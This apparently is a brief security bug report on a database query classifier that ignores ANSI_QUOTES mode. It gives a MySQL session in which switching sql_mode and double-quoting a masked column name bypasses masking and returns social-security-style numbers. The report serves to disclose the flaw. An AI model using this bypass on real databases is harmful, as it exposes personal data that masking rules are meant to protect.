|
The query classifier does not take into account ANSI_QUOTES mode, allowing a malicious user to bypass firewall filter rules.
mysql> select concat(ssn) from managers;
|
ERROR 1141 (HY000): The function concat is used in conjunction with a field that should be masked for 'maxuser'@'::ffff:127.0.0.1', access is denied.
|
|
mysql> set @@sql_mode = 'ANSI_QUOTES';
|
Query OK, 0 rows affected (0.00 sec)
|
|
mysql> select concat("ssn") from managers;
|
+---------------+
|
| concat("ssn") |
|
+---------------+
|
| 111-22-3333 |
|
| 444-55-6666 |
|
+---------------+
|
2 rows in set (0.00 sec)
|
|